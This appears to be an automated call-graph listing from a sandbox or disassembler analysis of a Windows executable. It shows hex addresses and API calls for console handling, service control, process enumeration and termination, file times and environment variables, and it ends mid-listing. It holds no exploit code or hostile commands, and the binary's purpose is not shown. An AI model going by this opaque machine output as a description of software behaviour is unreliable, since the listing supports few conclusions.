10537->10273 10541 40b6e6 10538->10541 10539->10541 10542 40b674 10539->10542 10540->10535 10543 40b6b5 RegCloseKey 10540->10543 10544 412cdc __fputwc_nolock 5 API calls 10541->10544 10545 40b5d0 113 API calls 10542->10545 10546 40b5d0 113 API calls 10543->10546 10547 40b6f7 10544->10547 10548 40b682 10545->10548 10549 40b6ca 10546->10549 10547->10273 10550 412cdc __fputwc_nolock 5 API calls 10548->10550 10551 412cdc __fputwc_nolock 5 API calls 10549->10551 10553 40b694 10550->10553 10552 40b6dc 10551->10552 10552->10273 10553->10273 10555 412c47 10554->10555 10556 412cc6 10554->10556 10561 412c6e 10555->10561 10653 4154f0 10555->10653 10659 412b4c 10556->10659 10561->10273 10563 40b353 10562->10563 10564 40b336 10562->10564 10566 412731 __snwprintf_s 101 API calls 10563->10566 10565 412731 __snwprintf_s 101 API calls 10564->10565 10567 40b34e 10565->10567 10566->10567 10568 40b371 10567->10568 10569 40b3a3 10567->10569 10570 405400 3 API calls 10568->10570 10571 40b411 RegOpenKeyExW 10569->10571 10572 40b3b4 RegCreateKeyExW 10569->10572 10574 40b389 10570->10574 10573 40b3d0 10571->10573 10572->10573 10575 40b3d4 GetLastError 10573->10575 10576 40b427 10573->10576 10577 412cdc __fputwc_nolock 5 API calls 10574->10577 10578 4052c0 107 API calls 10575->10578 10579 412cdc __fputwc_nolock 5 API calls 10576->10579 10580 40b39c 10577->10580 10581 40b3e2 10578->10581 10582 40b438 10579->10582 10580->10427 10583 405400 3 API calls 10581->10583 10582->10427 10584 40b3f7 10583->10584 10585 412cdc __fputwc_nolock 5 API calls 10584->10585 10586 40b40a 10585->10586 10586->10427 10588 412778 10587->10588 10589 41279f __VEC_memcpy 10588->10589 10590 40aded 10588->10590 10589->10590 10590->10452 10592 412731 __snwprintf_s 101 API calls 10591->10592 10593 408516 10592->10593 10594 40854c 10593->10594 10595 40851f 10593->10595 10650 40ae60 10594->10650 10597 405400 3 API calls 10595->10597 10599 408531 10597->10599 10602 412cdc __fputwc_nolock 5 API calls 10599->10602 10600 408566 10604 412cdc __fputwc_nolock 5 API calls 10600->10604 10601 40857e 10607 412731 __snwprintf_s 101 API calls 10601->10607 10646 4086e2 10601->10646 10603 408548 10602->10603 10603->10492 10606 40857a 10604->10606 10605 412cdc __fputwc_nolock 5 API calls 10608 4086fd 10605->10608 10606->10492 10609 4085a1 10607->10609 10608->10492 10610 4085aa 10609->10610 10611 4085db 10609->10611 10613 405400 3 API calls 10610->10613 10612 40af80 112 API calls 10611->10612 10614 4085e7 10612->10614 10615 4085c0 10613->10615 10616 408731 10614->10616 10617 4085f3 10614->10617 10618 412cdc __fputwc_nolock 5 API calls 10615->10618 10619 412cdc __fputwc_nolock 5 API calls 10616->10619 10621 412731 __snwprintf_s 101 API calls 10617->10621 10620 4085d7 10618->10620 10622 408745 10619->10622 10620->10492 10623 408617 10621->10623 10622->10492 10624 408620 10623->10624 10625 408651 10623->10625 10626 405400 3 API calls 10624->10626 10627 40af80 112 API calls 10625->10627 10628 408636 10626->10628 10629 408661 10627->10629 10632 412cdc __fputwc_nolock 5 API calls 10628->10632 10630 408719 10629->10630 10631 40866d 10629->10631 10633 412cdc __fputwc_nolock 5 API calls 10630->10633 10635 412731 __snwprintf_s 101 API calls 10631->10635 10634 40864d 10632->10634 10636 40872d 10633->10636 10634->10492 10637 408690 10635->10637 10636->10492 10638 408699 10637->10638 10639 4086ca 10637->10639 10640 405400 3 API calls 10638->10640 10641 40af80 112 API calls 10639->10641 10642 4086af 10640->10642 10643 4086da 10641->10643 10644 412cdc __fputwc_nolock 5 API calls 10642->10644 10645 408701 10643->10645 10643->10646 10648 4086c6 10644->10648 10647 412cdc __fputwc_nolock 5 API calls 10645->10647 10646->10605 10649 408715 10647->10649 10648->10492 10649->10492 10651 40ace0 123 API calls 10650->10651 10652 40855f 10651->10652 10652->10600 10652->10601 10670 4163b8 GetLastError 10653->10670 10655 412c5e 10656 415488 10655->10656 10657 4161e5 __decode_pointer 6 API calls 10656->10657 10660 412b64 10659->10660 10667 412b80 10659->10667 10661 412b6b 10660->10661 10663 412b94 10660->10663 10662 4154f0 __lseeki64_nolock 67 API calls 10661->10662 10664 412b70 10662->10664 10906 412ac5 10663->10906 10666 415488 __setmode 6 API calls 10664->10666 10666->10667 10667->10561 10668 416707 79 API calls __towlower_l 10669 412b9f 10668->10669 10669->10667 10669->10668 10684 416260 TlsGetValue 10670->10684 10673 416425 SetLastError 10673->10655 10685 416290 10684->10685 10686 416275 10684->10686 10685->10673 10689 4140f6 10685->10689 10687 4161e5 __decode_pointer 6 API calls 10686->10687 10688 416280 TlsSetValue 10687->10688 10688->10685 10691 4140ff 10689->10691 10692 41413c 10691->10692 10693 41411d Sleep 10691->10693 10735 418ceb 10691->10735 10692->10673 10694 4161e5 TlsGetValue 10692->10694 10693->10691 10736 418cf7 __mtinitlocknum 10735->10736 10907 412ad8 10906->10907 10911 412b25 10906->10911 10914 416431 10907->10914 10911->10669 10915 4163b8 __getptd_noexit 67 API calls 10914->10915 10916 416439 10915->10916 11123 401b2a __write_nolock 11122->11123 11124 404ebb 11123->11124 11125 401b4d AllocConsole GetConsoleWindow GetSystemMenu EnableMenuItem 11123->11125 11126 412cdc __fputwc_nolock 5 API calls 11124->11126 11273 40ca70 OpenSCManagerW 11125->11273 11128 404ed0 11126->11128 11128->10307 11128->10308 11130 401b8b GetServiceDisplayNameW 11132 401ba4 _memset 11130->11132 11133 401bb7 CloseServiceHandle 11130->11133 11131 401bbe 11134 401be0 11131->11134 11135 412731 __snwprintf_s 101 API calls 11131->11135 11132->11133 11133->11131 11136 412731 __snwprintf_s 101 API calls 11134->11136 11135->11134 11137 401c06 613 API calls 11136->11137 11277 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11137->11277 11139 404d0b 11278 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11139->11278 11141 404d14 11279 401ad0 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11141->11279 11143 404d22 11280 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11143->11280 11145 404d30 11281 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11145->11281 11147 404d39 11282 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11147->11282 11149 404d42 11283 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11149->11283 11151 404d4b 11284 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11151->11284 11153 404d54 11285 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11153->11285 11155 404d60 11286 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11155->11286 11157 404d6e 11287 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11157->11287 11159 404d7c 11288 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11159->11288 11161 404d8a 11289 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11161->11289 11163 404d98 11290 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11163->11290 11165 404da6 11291 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11165->11291 11167 404daf 11292 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11167->11292 11169 404db8 11293 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11169->11293 11171 404dc9 11294 401ad0 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11171->11294 11173 404dd7 11295 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11173->11295 11175 404de5 11296 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11175->11296 11177 404dee 11297 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11177->11297 11179 404dfc 11298 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11179->11298 11181 404e0a 11299 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11181->11299 11183 404e18 11300 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11183->11300 11185 404e26 11301 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11185->11301 11187 404e37 11302 401a80 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11187->11302 11189 404e45 11303 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11189->11303 11191 404e53 11304 401a30 GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW 11191->11304 11313 412cf0 11209->11313 11212 408a08 GetFileInformationByHandle 11214 408a18 SystemTimeToFileTime 11212->11214 11215 408a3a 11212->11215 11213 408b1d GetLastError 11216 408b28 11213->11216 11235 408b18 11213->11235 11218 408a48 CloseHandle 11214->11218 11215->11218 11219 4052c0 107 API calls 11216->11219 11217 412cdc __fputwc_nolock 5 API calls 11220 408ba7 11217->11220 11221 408a53 SystemTimeToFileTime 11218->11221 11228 408a9e 11218->11228 11222 408b2f 11219->11222 11220->10312 11315 4133a0 11221->11315 11224 405400 3 API calls 11222->11224 11226 408b47 SystemTimeToFileTime 11224->11226 11227 408acc FileTimeToSystemTime 11226->11227 11317 4088e0 11227->11317 11228->11227 11228->11235 11231 408b01 11233 405400 3 API calls 11231->11233 11232 408b5f GetLastError 11234 408b6a 11232->11234 11232->11235 11233->11235 11236 4052c0 107 API calls 11234->11236 11235->11217 11237 408b72 11236->11237 11238 405400 3 API calls 11237->11238 11238->11235 11240 4088b9 GetLastError 11239->11240 11241 40889b SetFilePointer 11239->11241 11244 4052c0 107 API calls 11240->11244 11242 4088b4 11241->11242 11243 4088ad SetEndOfFile 11241->11243 11242->10335 11243->11242 11245 4088c7 11244->11245 11246 405400 3 API calls 11245->11246 11247 4088d8 11246->11247 11247->10335 11249 409172 GetProcessHeap HeapAlloc 11248->11249 11250 409147 11248->11250 11251 4091d1 CreateThread 11249->11251 11252 409189 11249->11252 11250->11249 11257 409155 CreatePipe 11250->11257 11253 40925d 11251->11253 11254 40922e GetLastError 11251->11254 11255 405400 3 API calls 11252->11255 11253->10351 11256 4052c0 107 API calls 11254->11256 11258 4091a0 11255->11258 11259 40923b 11256->11259 11260 409165 SetHandleInformation 11257->11260 11261 4091a9 GetLastError 11257->11261 11258->10351 11263 405400 3 API calls 11259->11263 11260->11249 11262 4052c0 107 API calls 11261->11262 11264 4091b5 11262->11264 11265 40924b GetProcessHeap HeapFree 11263->11265 11266 405400 3 API calls 11264->11266 11265->11253 11267 4091c8 11266->11267 11267->10351 11269 4097c0 11268->11269 11270 4097f4 11269->11270 11271 412c36 __wcsnicmp 79 API calls 11269->11271 11270->10323 11272 409801 11271->11272 11272->10323 11274 40ca86 11273->11274 11276 401b82 11273->11276 11275 405400 3 API calls 11274->11275 11274->11276 11275->11276 11276->11130 11276->11131 11277->11139 11278->11141 11279->11143 11280->11145 11281->11147 11282->11149 11283->11151 11284->11153 11285->11155 11286->11157 11287->11159 11288->11161 11289->11163 11290->11165 11291->11167 11292->11169 11293->11171 11294->11173 11295->11175 11296->11177 11297->11179 11298->11181 11299->11183 11300->11185 11301->11187 11302->11189 11303->11191 11314 4089ba GetSystemTime CreateFileW 11313->11314 11314->11212 11314->11213 11316 408a7a CompareFileTime 11315->11316 11316->11228 11316->11235 11318 4088ea __write_nolock 11317->11318 11319 408902 GetSystemTime 11318->11319 11320 40890f 11318->11320 11319->11320 11321 412760 ___sbh_free_block __VEC_memcpy 11320->11321 11322 40891f PathFindExtensionW 11321->11322 11323 412731 __snwprintf_s 101 API calls 11322->11323 11324 40896b 11323->11324 11325 412731 __snwprintf_s 101 API calls 11324->11325 11326 408992 11325->11326 11327 412cdc __fputwc_nolock 5 API calls 11326->11327 11328 4089a5 MoveFileW 11327->11328 11328->11231 11328->11232 11330 40a474 11329->11330 11331 40a46c 11329->11331 11332 40a493 GetExitCodeProcess 11330->11332 11338 40a47d 11330->11338 11331->10404 11333 40a4a3 11332->11333 11334 40a4d9 11333->11334 11333->11338 11396 40a330 11333->11396 11336 40a4e9 EnumWindows 11334->11336 11334->11338 11342 40a512 11334->11342 11337 40a500 11336->11337 11336->11342 11426 40ea00 11337->11426 11338->10404 11339 40a565 TerminateProcess 11339->10404 11342->11338 11345 40a549 11342->11345 11443 40a1e0 CreateToolhelp32Snapshot 11342->11443 11343 40a530 11344 40ea00 110 API calls 11343->11344 11343->11345 11344->11345 11345->11338 11345->11339 11347 40fc31 GetSystemTimeAsFileTime 11346->11347 11361 40fde7 11346->11361 11349 40fc65 GetExitCodeProcess 11347->11349 11350 40fc9c 11347->11350 11348 412cdc __fputwc_nolock 5 API calls 11351 40fdf6 11348->11351 11352 40fc8b CloseHandle 11349->11352 11353 40fc7b 11349->11353 11354 412731 __snwprintf_s 101 API calls 11350->11354 11362 40fcdb 11350->11362 11351->10408 11352->11350 11468 409fc0 GetProcessTimes 11353->11468 11357 40fcbe 11354->11357 11356 40fc88 11356->11352 11359 405400 3 API calls 11357->11359 11358 40fd03 11358->11361 11363 40b5d0 117 API calls 11358->11363 11359->11362 11361->11348 11362->11358 11478 40a580 11362->11478 11370 40fd3a 11363->11370 11364 40fd77 11364->11361 11365 40fe85 11364->11365 11366 40fd87 11364->11366 11367 40fdfc 11364->11367 11368 40fe3d 11364->11368 11371 405400 3 API calls 11365->11371 11373 405400 3 API calls 11366->11373 11372 405400 3 API calls 11367->11372 11369 405400 3 API calls 11368->11369 11374 40fe58 11369->11374 11370->11364 11375 412c36 __wcsnicmp 79 API calls 11370->11375 11376 40fe9f 11371->11376 11377 40fe1d Sleep 11372->11377 11378 40fda9 11373->11378 11379 40e6e0 958 API calls 11374->11379 11375->11370 11380 40e6e0 958 API calls 11376->11380 11381 412cdc __fputwc_nolock 5 API calls 11377->11381 11538 40fb20 11378->11538 11384 40fe6a 11379->11384 11385 40feb1 11380->11385 11386 40fe37 11381->11386 11383 40fdaf 11383->11361 11391 405400 3 API calls 11383->11391 11387 412cdc __fputwc_nolock 5 API calls 11384->11387 11559 408480 11385->11559 11386->10408 11389 40fe7f 11387->11389 11389->10408 11393 40fdd0 Sleep 11391->11393 11395 40fb20 958 API calls 11393->11395 11395->11383 11397 40a340 11396->11397 11398 40a339 11396->11398 11399 40a349 11397->11399 11400 40a39a SetConsoleCtrlHandler 11397->11400 11401 40a35d GetLastError 11397->11401 11398->11334 11399->11334 11403 40a3b2 GetLastError 11400->11403 11404 40a3d5 GenerateConsoleCtrlEvent 11400->11404 11401->11398 11402 40a368 11401->11402 11405 40a393 11402->11405 11410 4052c0 107 API calls 11402->11410 11406 4052c0 107 API calls 11403->11406 11407 40a3e1 GetLastError 11404->11407 11408 40a406 FreeConsole 11404->11408 11405->11334 11412 40a3ba 11406->11412 11409 4052c0 107 API calls 11407->11409 11411 40a410 GetLastError 11408->11411 11425 40a42d 11408->11425 11413 40a3ea 11409->11413 11414 40a375 11410->11414 11415 4052c0 107 API calls 11411->11415 11417 405400 3 API calls 11412->11417 11418 405400 3 API calls 11413->11418 11419 405400 3 API calls 11414->11419 11420 40a419 11415->11420 11416 40ea00 110 API calls 11421 40a442 11416->11421 11422 40a3ce 11417->11422 11418->11422 11423 40a389 11419->11423 11424 405400 3 API calls 11420->11424 11421->11334 11422->11408 11423->11334 11424->11425 11425->11416 11427 40ea21 11426->11427 11427->11427 11428 40ea2c GetProcessHeap HeapAlloc 11427->11428 11429 40ea52 11428->11429 11430 40ea61 11428->11430 11431 412731 __snwprintf_s 101 API calls 11429->11431 11432 412731 __snwprintf_s 101 API calls 11430->11432 11431->11430 11433 40ea88 11432->11433 11434 40eab6 SetServiceStatus 11433->11434 11437 40eb38 WaitForSingleObject 11433->11437 11439 412731 101 API calls __snwprintf_s 11433->11439 11441 40eb60 11433->11441 11442 405400 3 API calls 11433->11442 11434->11433 11434->11437 11435 40eb89 11438 412cdc __fputwc_nolock 5 API calls 11435->11438 11436 40eb79 GetProcessHeap HeapFree 11436->11435 11437->11433 11437->11441 11440 40eb98 11438->11440 11439->11433 11440->11342 11441->11435 11441->11436 11442->11433 11444 40a222 Thread32First 11443->11444 11445 40a1f5 GetLastError 11443->11445 11446 40a257 GetLastError 11444->11446 11447 40a28b 11444->11447 11448 4052c0 107 API calls 11445->11448 11449 4052c0 107 API calls 11446->11449 11450 40a2b0 Thread32Next 11447->11450 11451 40a29f PostThreadMessageW 11447->11451 11452 40a202 11448->11452 11453 40a264 11449->11453 11454 40a2e8 GetLastError 11450->11454 11455 40a2bf 11450->11455 11451->11450 11456 405400 3 API calls 11452->11456 11457 405400 3 API calls 11453->11457 11458 40a2f5 GetLastError 11454->11458 11459 40a317 CloseHandle 11454->11459 11462 40a2c8 PostThreadMessageW 11455->11462 11463 40a2d9 Thread32Next 11455->11463 11460 40a217 11456->11460 11461 40a279 CloseHandle 11457->11461 11464 4052c0 107 API calls 11458->11464 11459->11343 11460->11343 11461->11343 11462->11463 11463->11454 11463->11455 11465 40a2ff 11464->11465 11466 405400 3 API calls 11465->11466 11467 40a314 11466->11467 11467->11459 11469 409fe6 GetLastError 11468->11469 11471 40a00f 11468->11471 11470 4052c0 107 API calls 11469->11470 11472 409ff3 11470->11472 11473 40a01c 11471->11473 11474 412760 ___sbh_free_block __VEC_memcpy 11471->11474 11475 405400 3 API calls 11472->11475 11473->11356 11476 40a036 11474->11476 11477 40a003 11475->11477 11476->11356 11477->11356 11479 40a5ac 11478->11479 11514 40a74c 11478->11514 11480 412731 __snwprintf_s 101 API calls 11479->11480 11482 40a5c5 11480->11482 11481 412cdc __fputwc_nolock 5 API calls 11483 40a854 11481->11483 11484 412731 __snwprintf_s 101 API calls 11482->11484 11483->11358 11485 40a5e3 11484->11485 11486 405400 3 API calls 11485->11486 11487 40a605 OpenProcess 11486->11487 11488 40a620 11487->11488 11489 40a6f5 GetLastError 11487->11489 11490 412731 __snwprintf_s 101 API calls 11488->11490 11491 4052c0 107 API calls 11489->11491 11492 40a63e 11490->11492 11493 40a703 11491->11493 11494 405400 3 API calls 11492->11494 11495 405400 3 API calls 11493->11495 11496 40a65d 11494->11496 11497 40a71c 11495->11497 11498 40a460 138 API calls 11496->11498 11499 40a71f CreateToolhelp32Snapshot 11497->11499 11500 40a66d 11498->11500 11501 40a754 _memset 11499->11501 11502 40a72e GetLastError 11499->11502 11503 40a674 GetExitCodeProcess 11500->11503 11504 40a6ec CloseHandle 11500->11504 11506 40a765 Process32FirstW 11501->11506 11505 4052c0 107 API calls 11502->11505 11507 40a684 11503->11507 11504->11499 11508 40a73b 11505->11508 11509 40a78b 11506->11509 11510 40a77f GetLastError 11506->11510 11507->11504 11511 40a699 GetLastError 11507->11511 11512 40a6ca 11507->11512 11513 405400 3 API calls 11508->11513 11567 40a040 11509->11567 11516 40a821 11510->11516 11518 4052c0 107 API calls 11511->11518 11515 405400 3 API calls 11512->11515 11513->11514 11514->11481 11519 40a6e9 11515->11519 11520 4052c0 107 API calls 11516->11520 11522 40a6a5 11518->11522 11519->11504 11524 40a827 11520->11524 11521 40a797 11525 40a7bc Process32NextW 11521->11525 11528 40a580 146 API calls 11521->11528 11523 405400 3 API calls 11522->11523 11526 40a6be CloseHandle 11523->11526 11527 405400 3 API calls 11524->11527 11529 40a810 GetLastError 11525->11529 11535 40a7cb 11525->11535 11526->11499 11532 40a838 11527->11532 11533 40a7b9 11528->11533 11530 40a83b CloseHandle 11529->11530 11531 40a81d GetLastError 11529->11531 11530->11514 11531->11516 11532->11530 11533->11525 11534 40a040 118 API calls 11534->11535 11535->11534 11536 40a801 Process32NextW 11535->11536 11537 40a580 146 API calls 11535->11537 11536->11529 11536->11535 11537->11535 11539 40f580 961 API calls 11538->11539 11540 40fb3a 11539->11540 11541 40fb43 11540->11541 11542 40fb87 11540->11542 11543 412731 __snwprintf_s 101 API calls 11541->11543 11544 405400 3 API calls 11542->11544 11545 40fb57 11543->11545 11546 40fbaf RegisterWaitForSingleObject 11544->11546 11549 405400 3 API calls 11545->11549 11547 40fbd4 GetLastError 11546->11547 11548 40fbf6 11546->11548 11550 4052c0 107 API calls 11547->11550 11551 412cdc __fputwc_nolock 5 API calls 11548->11551 11552 40fb71 11549->11552 11553 40fbe1 11550->11553 11554 40fc06 11551->11554 11555 412cdc __fputwc_nolock 5 API calls 11552->11555 11556 405400 3 API calls 11553->11556 11554->11383 11557 40fb83 11555->11557 11558 40fbf3 11556->11558 11557->11383 11558->11548 11560 408490 FreeLibrary 11559->11560 11561 408493 11559->11561 11560->11561 11562 40849c FreeLibrary 11561->11562 11563 40849f 11561->11563 11562->11563 11564 413919 11563->11564 11594 4137ed 11564->11594 11566 40fec3 11568 40a061 11567->11568 11569 40a077 OpenProcess 11567->11569 11570 412cdc __fputwc_nolock 5 API calls 11568->11570 11571 40a0e7 11569->11571 11572 40a08f 11569->11572 11574 40a073 11570->11574 11573 409f50 112 API calls 11571->11573 11575 412731 __snwprintf_s 101 API calls 11572->11575 11576 40a0f2 11573->11576 11574->11521 11577 40a0a6 GetLastError 11575->11577 11579 40a117 CloseHandle CompareFileTime 11576->11579 11580 40a0fa CloseHandle 11576->11580 11578 4052c0 107 API calls 11577->11578 11581 40a0b6 11578->11581 11583 40a135 11579->11583 11584 40a14c CompareFileTime 11579->11584 11582 412cdc __fputwc_nolock 5 API calls 11580->11582 11586 405400 3 API calls 11581->11586 11587 40a113 11582->11587 11588 412cdc __fputwc_nolock 5 API calls 11583->11588 11585 412cdc __fputwc_nolock 5 API calls 11584->11585 11589 40a175 11585->11589 11590 40a0cf 11586->11590 11587->11521 11591 40a148 11588->11591 11589->11521 11592 412cdc __fputwc_nolock 5 API calls 11590->11592 11591->11521 11593 40a0e3 11592->11593 11593->11521 11595 4137f9 __mtinitlocknum 11594->11595 11596 4145cc __lock 67 API calls 11595->11596 11597 413800 11596->11597 11599 4161e5 __decode_pointer 6 API calls 11597->11599 11603 4138b9 __initterm 11597->11603 11601 413837 11599->11601 11601->11603 11605 4161e5 __decode_pointer 6 API calls 11601->11605 11602 413901 __mtinitlocknum 11602->11566 11611 413904 11603->11611 11610 41384c 11605->11610 11606 4138f8 11607 4136fd __mtinitlocknum 3 API calls 11606->11607 11607->11602 11608 4161dc 6 API calls __init_pointers 11608->11610 11609 4161e5 6 API calls __decode_pointer 11609->11610 11610->11603 11610->11608 11610->11609 11612 41390a 11611->11612 11614 4138e5 11611->11614 11616 4144f2 LeaveCriticalSection 11612->11616 11614->11602 11615 4144f2 LeaveCriticalSection 11614->11615 11615->11606 11616->11614 11618 405170 11617->11618 11623 405150 11618->11623 11621 405187 11621->10413 11622 40517e FreeEnvironmentStringsW 11622->11621 11626 405080 11623->11626 11627 405137 11626->11627 11628 405095 11626->11628 11627->11621 11627->11622 11628->11627 11630 405105 SetEnvironmentVariableW 11628->11630 11631 4050e2 SetEnvironmentVariableW 11628->11631 11632 4050ee GetProcessHeap HeapFree 11628->11632 11633 404fb0 ExpandEnvironmentStringsW 11628->11633 11630->11628 11631->11628 11631->11632 11632->11628 11634 404fc7 GetLastError 11633->11634 11635 404fed GetProcessHeap HeapAlloc 11633->11635 11638 4052c0 107 API calls 11634->11638 11636 40500a 11635->11636 11637 40502b ExpandEnvironmentStringsW 11635->11637 11639 405400 3 API calls 11636->11639 11640 405038 GetLastError 11637->11640 11641 40506c 11637->11641 11642 404fd4 11638->11642 11643 405021 11639->11643 11644 4052c0 107 API calls 11640->11644 11641->11628 11645 405400 3 API calls 11642->11645 11643->11628 11647 405045 11644->11647 11646 404fe5 11645->11646 11646->11628 11648 405400 3 API calls 11647->11648 11649 405056 GetProcessHeap HeapFree 11648->11649 11649->11628 11653 404eeb 11650->11653 11658 404f61 11650->11658 11651 404f1a 11651->10421 11652 404f1e GetProcessHeap HeapAlloc 11654 404f59 11652->11654 11655 404f39 11652->11655 11653->11651 11653->11652 11653->11653 11656 412760 ___sbh_free_block __VEC_memcpy 11654->11656 11657 405400 3 API calls 11655->11657 11656->11658 11659 404f50 11657->11659 11658->10421 11659->10421 11661 412f51 11660->11661 11663 412f71 11660->11663 11662 4154f0 __lseeki64_nolock 67 API calls 11661->11662 11664 412f56 11662->11664 11665 412f7f 11663->11665 11668 412fa6 11663->11668 11667 415488 __setmode 6 API calls 11664->11667 11666 4154f0 __lseeki64_nolock 67 API calls 11665->11666 11671 40fb57 11665->11671 11669 412f9b 11666->11669 11667->11671 11670 4154f0 __lseeki64_nolock 67 API calls 11668->11670 11673 415488 __setmode 6 API calls 11669->11673 11672 412fab 11670->11672 11671->10153 11674 412fe6 11672->11674 11675 412fb9 11672->11675 11673->11671 11677 412e4c __vswprintf_helper 101 API calls 11674->11677 11690 412e4c 11675->11690 11678 412ff4 11677->11678 11681 413009 11678->11681 11685 41301c 11678->11685 11680 412fd3 11682 4154f0 __lseeki64_nolock 67 API calls 11680->11682 11683 4154f0 __lseeki64_nolock 67 API calls 11681->11683 11684 412fd8 11682->11684 11686 41300e 11683->11686 11684->11671 11687 4154f0 __lseeki64_nolock 67 API calls 11684->11687 11685->11671 11688 4154f0 __lseeki64_nolock 67 API calls 11685->11688 11686->11671 11689 4154f0 __lseeki64_nolock 67 API calls 11686->11689 11687->11671 11688->11669 11689->11671 11691 412e7c 11690->11691 11692 412e5c 11690->11692 11695 412e8c 11691->11695 11701 412eac 11691->11701 11693 4154f0 __lseeki64_nolock 67 API calls 11692->11693 11694 412e61 11693->11694 11696 415488 __setmode 6 API calls 11694->11696 11697 4154f0 __lseeki64_nolock 67 API calls 11695->11697 11703 412e71 11696->11703 11698 412e91 11697->11698 11699 415488 __setmode 6 API calls 11698->11699 11699->11703 11700 412ef3 11700->11703 11704 4145ff __flsbuf 101 API calls 11700->11704 11701->11700 11701->11703 11705 4145ff 11701->11705 11703->11680 11703->11685 11704->11703 11726 413b64 11705->11726 11708 414631 11710 414635 11708->11710 11715 414642 __flswbuf 11708->11715 11709 41461a 11711 4154f0 __lseeki64_nolock 67 API calls 11709->11711 11712 4154f0 __lseeki64_nolock 67 API calls 11710->11712 11720 41461f 11711->11720 11712->11720 11713 414732 11716 41a30e __locking 101 API calls 11713->11716 11714 4146b2 11717 4146e6 11714->11717 11718 4146c9 11714->11718 11715->11720 11722 414698 11715->11722 11725 4146a3 11715->11725 11732 41a6b2 11715->11732 11716->11720 11717->11720 11769 41a550 11717->11769 11744 41a30e 11718->11744 11720->11700 11722->11725 11741 41a669 11722->11741 11725->11713 11725->11714 11727 413b73 11726->11727 11729 413b88 11726->11729 11728 4154f0 __lseeki64_nolock 67 API calls 11727->11728 11730 413b78 11728->11730 11729->11708 11729->11709 11731 415488 __setmode 6 API calls 11730->11731 11731->11729 11733 41a6bf 11732->11733 11734 41a6ce 11732->11734 11735 4154f0 __lseeki64_nolock 67 API calls 11733->11735 11737 41a6f2 11734->11737 11738 4154f0 __lseeki64_nolock 67 API calls 11734->11738 11736 41a6c4 11735->11736 11736->11722 11737->11722 11739 41a6e2 11738->11739 11740 415488 __setmode 6 API calls 11739->11740 11740->11737 11742 4140b1 __malloc_crt 67 API calls 11741->11742 11743 41a67e 11742->11743 11743->11725 11745 41a31a __mtinitlocknum 11744->11745 11746 41a322 11745->11746 11747 41a33d 11745->11747 11801 415503 11746->11801 11749 41a34b 11747->11749 11754 41a38c 11747->11754 11751 415503 __close 67 API calls 11749->11751 11753 41a350 11751->11753 11752 4154f0 __lseeki64_nolock 67 API calls 11764 41a32f __mtinitlocknum 11752->11764 11756 4154f0 __lseeki64_nolock 67 API calls 11753->11756 11804 4186bb 11754->11804 11758 41a357 11756->11758 11757 41a392 11759 41a3b5 11757->11759 11760 41a39f 11757->11760 11761 415488 __setmode 6 API calls 11758->11761 11763 4154f0 __lseeki64_nolock 67 API calls 11759->11763 11814 419bdb 11760->11814 11761->11764 11766 41a3ba 11763->11766 11764->11720 11765 41a3ad 11873 41a3e0 11765->11873 11767 415503 __close 67 API calls 11766->11767 11767->11765 11770 41a55c __mtinitlocknum 11769->11770 11771 41a589 11770->11771 11772 41a56d 11770->11772 11774 41a597 11771->11774 11776 41a5b8 11771->11776 11773 415503 __close 67 API calls 11772->11773 11775 41a572 11773->11775 11777 415503 __close 67 API calls 11774->11777 11780 4154f0 __lseeki64_nolock 67 API calls 11775->11780 11778 41a5d8 11776->11778 11779 41a5fe 11776->11779 11781 41a59c 11777->11781 11782 415503 __close 67 API calls 11778->11782 11784 4186bb ___lock_fhandle 68 API calls 11779->11784 11783 41a57a __mtinitlocknum 11780->11783 11785 4154f0 __lseeki64_nolock 67 API calls 11781->11785 11787 41a5dd 11782->11787 11783->11720 11788 41a604 11784->11788 11786 41a5a3 11785->11786 11789 415488 __setmode 6 API calls 11786->11789 11790 4154f0 __lseeki64_nolock 67 API calls 11787->11790 11791 41a611 11788->11791 11792 41a62d 11788->11792 11789->11783 11794 41a5e4 11790->11794 11795 41a4cb __lseeki64_nolock 69 API calls 11791->11795 11793 4154f0 __lseeki64_nolock 67 API calls 11792->11793 11797 41a632 11793->11797 11798 415488 __setmode 6 API calls 11794->11798 11796 41a622 11795->11796 11915 41a65f 11796->11915 11799 415503 __close 67 API calls 11797->11799 11798->11783 11799->11796 11802 4163b8 __getptd_noexit 67 API calls 11801->11802 11803 415508 11802->11803 11803->11752 11805 4186c7 __mtinitlocknum 11804->11805 11806 418722 11805->11806 11808 4145cc __lock 67 API calls 11805->11808 11807 418727 EnterCriticalSection 11806->11807 11810 418744 __mtinitlocknum 11806->11810 11807->11810 11809 4186f3 